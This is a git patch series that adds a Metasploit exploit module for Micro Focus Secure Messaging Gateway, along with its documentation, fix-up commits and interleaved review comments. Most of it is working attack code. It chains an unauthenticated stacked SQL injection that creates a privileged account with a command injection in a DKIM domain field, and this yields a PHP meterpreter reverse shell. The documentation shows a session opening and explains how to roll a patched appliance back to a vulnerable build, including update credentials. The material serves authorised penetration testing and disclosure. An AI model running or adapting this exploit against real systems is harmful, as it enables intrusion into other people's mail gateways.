From 4c1c2e92882796772daf210c2553bab987e98801 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Mehmet=20=C4=B0nce?=
Date: Wed, 4 Jul 2018 17:47:13 +0100
Subject: [PATCH 1/5] Adding Micro Focus Secure Messaging Gateway RCE
---
 .../microfocus_secure_messaging_gateway.md | 59 +++++
 .../microfocus_secure_messaging_gateway.rb | 214 ++++++++++++++++++
 2 files changed, 273 insertions(+)
 create mode 100644 documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md
 create mode 100644 modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
diff --git a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md
new file mode 100644
index 0000000000..45d7af8454
--- /dev/null
+++ b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md
@@ -0,0 +1,59 @@
+## Vulnerable Application
+This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway. An unauthenticated user can execute a terminal command under the context of the web user.
+
+One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding, which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible to access this endpoint without having a valid session.
+
+Combining these vulnerabilities gives the opportunity execute operation system commands under the context of the web user.
+
+**Vulnerable Application Installation Steps**
+
+Complate following trial submission form. You will be able to download the product as a OVA or ISO file.
+
+[https://www.microfocus.com/products/secure-gateway/trial/](https://www.microfocus.com/products/secure-gateway/trial/)
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/microfocus_secure_messaging_gateway `
+- [ ] Set `RHOST`
+- [ ] Set `LHOST`
+- [ ] Run `check`
+- [ ] **Verify** that you are seeing `The target is vulnerable`
+- [ ] Run `exploit`
+- [ ] **Verify** that you are seeing `Creating an user with appropriate privileges` in console.
+- [ ] **Verify** that you are seeing `User successfully created. Username : rmcynlbredxqh` in console.
+- [ ] **Verify** that you are seeing `Authenticating with created user` in console.
+- [ ] **Verify** that you are seeing `Successfully authenticated` in console.
+- [ ] **Verify** that you are seeing `Creating a domain with a malformed DKIM data` in console.
+- [ ] **Verify** that you are seeing `Payload is successfully implanted` in console.
+- [ ] **Verify** that you are seeing `Triggerring an implanted payload` in console.
+- [ ] **Verify** that you are getting meterpreter session.
+
+## Scenarios
+
+```
+msf5 > use exploit/linux/http/microfocus_secure_messaging_gateway
+msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > set RHOSTS 12.0.0.25
+RHOSTS => 12.0.0.25
+msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > set LHOST 12.0.0.1
+LHOST => 12.0.0.1
+msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > run
+
+[*] Started reverse TCP handler on 12.0.0.1:4444
+[*] Creating an user with appropriate privileges
+[+] User successfully created. Username : rmcynlbredxqh
+[*] Authenticating with created user
+[+] Successfully authenticated
+[*] Creating a domain record with a malformed DKIM data
+[+] Payload is successfully implanted
+[*] Triggerring an implanted payload
+[*] Sending stage (37775 bytes) to 12.0.0.25
+[*] Meterpreter session 10 opened (12.0.0.1:4444 -> 12.0.0.25:44332) at 2018-06-25 20:26:54 +0100
+[*] Cleaning up...
+
+meterpreter > pwd
+/opt/gwava/gwavaman/http/admin/contents/ou
+meterpreter >
+```
\ No newline at end of file
diff --git a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
new file mode 100644
index 0000000000..349ef53417
--- /dev/null
+++ b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
@@ -0,0 +1,214 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "MicroFocus Secure Messaging Gateway Remote Code Execution",
+ 'Description' => %q{
+ This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway.
+ An unauthenticated user can execute a terminal command under the context of the web user.
+
+ One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,
+ which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system.
+ manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible
+ to access this endpoint without having a valid session.
+
+ Combining these vulnerabilities gives the opportunity execute operation system commands under the context
+ of the web user.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Mehmet Ince ' # author & msf module
+ ],
+ 'References' =>
+ [
+ ['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'],
+ ['CVE', '2018-12464'],
+ ['CVE', '2018-12465'],
+ ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'],
+ ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'Payload' => 'php/meterpreter/reverse_tcp',
+ 'Encoder' => 'php/base64'
+ },
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [[ 'Automatic', { }]],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Jun 19 2018",
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
+ ]
+ )
+ end
+
+ def execute_query(query)
+ #
+ # We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques
+ # but since we are able to use stacked-query approach, following form of payload is required in order to be able
+ # get back the output of query !
+ #
+ r = rand_text_alphanumeric(3 + rand(3))
+ sql = r
+ sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine "
+ sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine "
+ sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; "
+ sql << query
+ sql << "; -- "
+ sql << r
+
+ send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
+ 'vars_post' => {
+ 'appkey' => r
+ }
+ )
+
+ end
+
+ def something_went_wrong
+ fail_with Failure::Unknown, 'Something went wrong'
+ end
+
+ def check
+ r = rand_text_numeric(15 + rand(20))
+ res = execute_query("SELECT #{r}")
+ if res && res.code == 200 && res.body.include?(r)
+ Exploit::CheckCode::Vulnerable
+ else
+ Exploit::CheckCode::Safe
+ end
+ end
+
+ def implant_payload(cookie)
+ print_status('Creating a domain record with a malformed DKIM data')
+ p = [
+ {
+ :id => 'temp_0',
+ :Description => rand_text_alpha(5),
+ :DkimList => [
+ {
+ :Domain => "$(php -r '#{payload.encoded}')",
+ :Selector => '',
+ :TempId => 'tempDkim_1'
+ }
+ ]
+ }
+ ].to_json
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'),
+ 'cookie' => cookie,
+ 'vars_get' => {
+ 'cache' => 0,
+ },
+ 'vars_post' => {
+ 'StateData' => '[{"ouid":1}]',
+ 'SaveData' => p
+ }
+ })
+
+ if res && res.code == 200 && res.body.include?('DbNodeId')
+ # Defining as global variable since we need to access them later within clean up function.
+ @domainid = JSON.parse(res.body)['Nodes'][0]['DbNodeId']
+ @dkimid = JSON.parse(res.body)['Nodes'][1]['DbNodeId']
+ print_good('Payload is successfully implanted')
+ else
+ something_went_wrong
+ end
+ end
+
+ def create_user
+ # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection
+ # issue location where requires a valid session !
+ print_status('Creating an user with appropriate privileges')
+
+ # Defining as global variable since we need to access them later within clean up function.
+ @username = rand_text_alpha_lower(5 + rand(20))
+ @userid = rand_text_numeric(6 + rand(2))
+ query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"
+
+ execute_query(query)
+ res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'")
+
+ if res && res.code == 200 && res.body.include?(@username)
+ print_good("User successfully created. Username : #{@username}")
+ else
+ something_went_wrong
+ end
+ end
+
+ def login
+ print_status("Authenticating with created user")
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'),
+ 'vars_post' => {
+ 'username' => @username,
+ 'password' => rand_text_alpha_lower(5 + rand(20)),
+ 'passwordmandatory' => rand_text_alpha_lower(5 + rand(20)),
+ 'LimitInterfaceId' => 1
+ }
+ )
+ if res && res.code == 200 && res.body.include?('/ui/default/index.php')
+ print_good('Successfully authenticated')
+ cookie = res.get_cookies
+ else
+ something_went_wrong
+ end
+ cookie
+ end
+
+ def exploit
+ unless check == CheckCode::Vulnerable
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+ end
+
+ create_user
+ cookie = login
+ implant_payload(cookie)
+
+ print_status('Triggerring an implanted payload')
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),
+ 'cookie' => cookie,
+ 'vars_get' => {
+ 'cache' => 0,
+ },
+ 'vars_post' => {
+ 'DkimRecordId' => @dkimid
+ }
+ })
+
+ end
+
+ def on_new_session(session)
+ print_status('Cleaning up...')
+ cmd = ""
+ cmd << 'PGPASSWORD=postgres psql -U postgres -d SecureGateway -c "'
+ cmd << "DELETE FROM account WHERE loginname ='#{@username}';"
+ cmd << "DELETE FROM UserRole WHERE idaccount = #{@userid};"
+ cmd << "DELETE FROM Domain WHERE iddomain = #{@domainid};"
+ cmd << "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};"
+ cmd << '"'
+ session.shell_command_token(cmd)
+ end
+
+end
From 3b8149216fd5fef504646fbf47794d82fe73dde4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Mehmet=20=C4=B0nce?=
Date: Wed, 4 Jul 2018 23:20:58 +0100
Subject: [PATCH 2/5] print a verbose error message
---
 .../http/microfocus_secure_messaging_gateway.rb | 13 ++++++++-----
 1 file changed, 8 insertions(+), 5 deletions(-)
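Review bot: The account, role, domain and DKIM rows written by this module are only removed in `on_new_session`, so every failure after `create_user` (any call to `something_went_wrong`, or no session arriving) leaves them on the appliance with no hint to the operator. `login` submits a random password and expects success, which suggests the inserted account accepts any password, so the leftover is a standing access risk on the tested system until someone deletes it. At minimum `something_went_wrong` should report what was created before failing, for example `print_warning("Manual cleanup required: account #{@username} (id #{@userid})") if @username`, and the module documentation should name the four tables touched (account, UserRole, Domain, DkimSignature) so the rows can be audited afterwards. The comments that call `@username`, `@userid`, `@domainid` and `@dkimid` global variables should say instance variables.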
diff --git a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
index 349ef53417..137b86b4ba 100644
--- a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
+++ b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
@@ -87,13 +87,16 @@ class MetasploitModule < Msf::Exploit::Remote
 end

 def check
- r = rand_text_numeric(15 + rand(20))
+ r = rand_text_numeric(15..35)
 res = execute_query("SELECT #{r}")
- if res && res.code == 200 && res.body.include?(r)
- Exploit::CheckCode::Vulnerable
- else
- Exploit::CheckCode::Safe
+ unless res
+ vprint_error 'Connection failed'
+ return CheckCode::Unknown
 end
+ unless res.code == 200 && res.body.include?(r)
+ return CheckCode::Safe
+ end
+ CheckCode::Vulnerable
 end

 def implant_payload(cookie)
From a272dcabd74bdc289ba7b13d1913526cd0ef16d8 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Mehmet=20=C4=B0nce?=
Date: Thu, 5 Jul 2018 13:33:40 +0100
Subject: [PATCH 3/5] Fix typos and additional updates regarding to review
---
 .../microfocus_secure_messaging_gateway.md | 6 +++---
 .../microfocus_secure_messaging_gateway.rb | 21 +++++++++++--------
 2 files changed, 15 insertions(+), 12 deletions(-)
diff --git a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md
index 45d7af8454..b37438049d 100644
--- a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md
+++ b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md
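Review bot: In `check`, `CheckCode::Safe` is still returned for any reply that is not a 200 containing the marker, so an error page, a redirect or a filtering proxy in front of the appliance is reported as safe. A false safe verdict is the costly outcome for anyone using this check to confirm that a host was patched, so only a 200 reply without the marker should yield Safe: `return CheckCode::Unknown unless res.code == 200` followed by `return CheckCode::Safe unless res.body.include?(r)`. The marker `r` can also begin with `0`; if the backend echoes it as a number the leading zero would presumably be dropped and the comparison would miss, which is worth confirming against a test instance.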
@@ -7,7 +7,7 @@ Combining these vulnerabilities gives the opportunity execute operation system c

 **Vulnerable Application Installation Steps**

-Complate following trial submission form. You will be able to download the product as a OVA or ISO file.
+Complete following trial submission form. You will be able to download the product as a OVA or ISO file.

 [https://www.microfocus.com/products/secure-gateway/trial/](https://www.microfocus.com/products/secure-gateway/trial/)

@@ -28,7 +28,7 @@ A successful check of the exploit will look like this:
 - [ ] **Verify** that you are seeing `Successfully authenticated` in console.
 - [ ] **Verify** that you are seeing `Creating a domain with a malformed DKIM data` in console.
 - [ ] **Verify** that you are seeing `Payload is successfully implanted` in console.
-- [ ] **Verify** that you are seeing `Triggerring an implanted payload` in console.
+- [ ] **Verify** that you are seeing `Triggering an implanted payload` in console.
 - [ ] **Verify** that you are getting meterpreter session.

 ## Scenarios
@@ -48,7 +48,7 @@ msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > run
 [+] Successfully authenticated
 [*] Creating a domain record with a malformed DKIM data
 [+] Payload is successfully implanted
-[*] Triggerring an implanted payload
+[*] Triggering an implanted payload
 [*] Sending stage (37775 bytes) to 12.0.0.25
 [*] Meterpreter session 10 opened (12.0.0.1:4444 -> 12.0.0.25:44332) at 2018-06-25 20:26:54 +0100
 [*] Cleaning up...
diff --git a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
index 137b86b4ba..5841e96237 100644
--- a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
+++ b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
@@ -51,7 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote

 register_options(
 [
- Opt::RPORT(80),
 OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
 ]
 )
@@ -129,8 +128,12 @@ class MetasploitModule < Msf::Exploit::Remote

 if res && res.code == 200 && res.body.include?('DbNodeId')
 # Defining as global variable since we need to access them later within clean up function.
- @domainid = JSON.parse(res.body)['Nodes'][0]['DbNodeId']
- @dkimid = JSON.parse(res.body)['Nodes'][1]['DbNodeId']
+ begin
+ @domainid = JSON.parse(res.body)['Nodes'][0]['DbNodeId']
+ @dkimid = JSON.parse(res.body)['Nodes'][1]['DbNodeId']
+ rescue => e
+ fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
+ end
 print_good('Payload is successfully implanted')
 else
 something_went_wrong
@@ -140,11 +143,11 @@ class MetasploitModule < Msf::Exploit::Remote
 def create_user
 # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection
 # issue location where requires a valid session !
- print_status('Creating an user with appropriate privileges')
+ print_status('Creating a user with appropriate privileges')

 # Defining as global variable since we need to access them later within clean up function.
- @username = rand_text_alpha_lower(5 + rand(20))
- @userid = rand_text_numeric(6 + rand(2))
+ @username = rand_text_alpha_lower(5..25)
+ @userid = rand_text_numeric(6..8)
 query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"

 execute_query(query)
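Review bot: In the `implant_payload` hunk (`@@ -129,8 +128,12 @@`) the two ids are stored exactly as the server returned them, and the bare `rescue => e` catches every StandardError without showing which lookup failed. Both values are later interpolated into the psql command line built in `on_new_session` (outside this hunk), so they should be confirmed numeric where they are read: parse the body once with `nodes = JSON.parse(res.body)['Nodes']`, then `@domainid = Integer(nodes[0]['DbNodeId'])` and `@dkimid = Integer(nodes[1]['DbNodeId'])`, and rescue only the parse, nil-lookup and conversion errors. The hunk in PATCH 4/5 that switches these lines to `res.get_json_document` keeps the same shape and the same gap. The enclosing method starts and ends outside the hunk.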
@@ -164,8 +167,8 @@ class MetasploitModule < Msf::Exploit::Remote
 'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'),
 'vars_post' => {
 'username' => @username,
- 'password' => rand_text_alpha_lower(5 + rand(20)),
- 'passwordmandatory' => rand_text_alpha_lower(5 + rand(20)),
+ 'password' => rand_text_alpha_lower(5..25),
+ 'passwordmandatory' => rand_text_alpha_lower(5..25),
 'LimitInterfaceId' => 1
 }
 )
@@ -187,7 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
 cookie = login
 implant_payload(cookie)

- print_status('Triggerring an implanted payload')
+ print_status('Triggering an implanted payload')
 send_request_cgi({
 'method' => 'POST',
 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),
From 48a903f0b358ea0e3901849e963e3abd451772f4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Mehmet=20=C4=B0nce?=
Date: Tue, 31 Jul 2018 00:57:32 +0300
Subject: [PATCH 4/5] Fixing r and sql variables use same object issue
---
 .../linux/http/microfocus_secure_messaging_gateway.rb | 11 +++++------
 1 file changed, 5 insertions(+), 6 deletions(-)
diff --git a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
index 5841e96237..c9aa5388a6 100644
--- a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
+++ b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
@@ -62,20 +62,19 @@ class MetasploitModule < Msf::Exploit::Remote
 # but since we are able to use stacked-query approach, following form of payload is required in order to be able
 # get back the output of query !
 #
- r = rand_text_alphanumeric(3 + rand(3))
- sql = r
+ sql = rand_text_alphanumeric(3 + rand(3))
 sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine "
 sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine "
 sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; "
 sql << query
 sql << "; -- "
- sql << r
+ sql << rand_text_alphanumeric(3 + rand(3))

 send_request_cgi(
 'method' => 'POST',
 'uri' => normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
 'vars_post' => {
- 'appkey' => r
+ 'appkey' => sql
 }
 )

@@ -129,8 +128,8 @@ class MetasploitModule < Msf::Exploit::Remote
 if res && res.code == 200 && res.body.include?('DbNodeId')
 # Defining as global variable since we need to access them later within clean up function.
 begin
- @domainid = JSON.parse(res.body)['Nodes'][0]['DbNodeId']
- @dkimid = JSON.parse(res.body)['Nodes'][1]['DbNodeId']
+ @domainid = res.get_json_document['Nodes'][0]['DbNodeId']
+ @dkimid = res.get_json_document['Nodes'][1]['DbNodeId']
 rescue => e
 fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
 end
From 7d08c7172245bfc01f762a2d6c7221fb3a120028 Mon Sep 17 00:00:00 2001
From: Wei Chen
Date: Mon, 30 Jul 2018 21:05:46 -0500
Subject: [PATCH 5/5] Update documentation about how to make it vulnerable again
---
 .../microfocus_secure_messaging_gateway.md | 97 +++++++++++++++----
 1 file changed, 76 insertions(+), 21 deletions(-)
diff --git a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md
index b37438049d..fdc5f34a41 100644
--- a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md
+++ b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md
@@ -1,35 +1,90 @@ ## Vulnerable Application -This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway. An unauthenticated user can execute a terminal command under the context of the web user. +This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging +Gateway. An unauthenticated user can execute a terminal command under the context of the web user. -One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding, which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible to access this endpoint without having a valid session. +One of the user supplied parameters of API endpoint is used by the application without input validation +and/or parameter binding, which leads to SQL injection vulnerability. Successfully exploiting this +vulnerability gives a ability to add new user onto system. manage_domains_dkim_keygen_request.php +endpoint is responsible for executing an operation system command. It's not possible to access this +endpoint without having a valid session. -Combining these vulnerabilities gives the opportunity execute operation system commands under the context of the web user. +Combining these vulnerabilities gives the opportunity execute operation system commands under the +context of the web user. -**Vulnerable Application Installation Steps** +## Vulnerable Application Installation Steps -Complete following trial submission form. You will be able to download the product as a OVA or ISO file. +Complete the following trial submission form. You will be able to [download the product as a OVA or ISO file](https://www.microfocus.com/products/secure-gateway/trial/). 
+Installation instructions can be [found here](https://www.microfocus.com/documentation/secure-messaging-gateway/GWAVA%207.0/secure-gateway.pdf). -[https://www.microfocus.com/products/secure-gateway/trial/](https://www.microfocus.com/products/secure-gateway/trial/) +Please note that newer trial appliances by default are no longer vulnerable to the attacks used by +this module, but for testing purposes there is a way to make it vulnerable again. + +First, go ahead and install the ISO. The appliance is based on Debian (for example, version 7 is +running a modified version of Ubuntu 16.04), so installation should be very similar to that. + +After you log into the system as "gwava:gwava" (which is the default credential), you should see +this on your screen: + +``` +#################################### + +Please run the following command: + +sudo /opt/gwavapreinstall.sh + +#################################### +``` + +The gwavapreinstall.sh script is what you need to modify. To do this, open it with your favorite text +editor with sudo like this: + +``` +$ sudo nano -w /opt/gwavapreinstall.sh +``` + +The bash script uses svn to download the latest software from the official site, but we can go back to +a specific commit to test the vulnerability again. Go ahead and find this line in the file: + +``` +sudo svn co --username gwavaupdate --password gwavam8 --non-interactive https://gwava7updates.gwava.com/update/gwava7/release $GWAVA_DIR +``` + +And modify to (the difference is the ```release@444```): + +``` +sudo svn co --username gwavaupdate --password gwavam8 --non-interactive https://gwava7updates.gwava.com/update/gwava7/release@444 $GWAVA_DIR +``` + +Make sure you save it, and then now run the script: + +``` +$ sudo /opt/gwavapreinstall.sh +``` + +After running the script, make sure to browse to https://[IP] to complete the installation. And then +after that, you are ready to test the module. 
+ +Note that the module may not work at the very first try, but the second time should work. ## Verification Steps A successful check of the exploit will look like this: -- [ ] Start `msfconsole` -- [ ] `use exploit/linux/http/microfocus_secure_messaging_gateway ` -- [ ] Set `RHOST` -- [ ] Set `LHOST` -- [ ] Run `check` -- [ ] **Verify** that you are seeing `The target is vulnerable` -- [ ] Run `exploit` -- [ ] **Verify** that you are seeing `Creating an user with appropriate privileges` in console. -- [ ] **Verify** that you are seeing `User successfully created. Username : rmcynlbredxqh` in console. -- [ ] **Verify** that you are seeing `Authenticating with created user` in console. -- [ ] **Verify** that you are seeing `Successfully authenticated` in console. -- [ ] **Verify** that you are seeing `Creating a domain with a malformed DKIM data` in console. -- [ ] **Verify** that you are seeing `Payload is successfully implanted` in console. -- [ ] **Verify** that you are seeing `Triggering an implanted payload` in console. -- [ ] **Verify** that you are getting meterpreter session. +1. Start `msfconsole` +2. `use exploit/linux/http/microfocus_secure_messaging_gateway ` +3. Set `RHOST` +4. Set `LHOST` +5. Run `check` +6. **Verify** that you are seeing `The target is vulnerable` +7. Run `exploit` +8. **Verify** that you are seeing `Creating an user with appropriate privileges` in console. +9. **Verify** that you are seeing `User successfully created. Username : rmcynlbredxqh` in console. +10. **Verify** that you are seeing `Authenticating with created user` in console. +11. **Verify** that you are seeing `Successfully authenticated` in console. +12. **Verify** that you are seeing `Creating a domain with a malformed DKIM data` in console. +13. **Verify** that you are seeing `Payload is successfully implanted` in console. +14. **Verify** that you are seeing `Triggering an implanted payload` in console. +15. **Verify** that you are getting meterpreter session. 
## Scenarios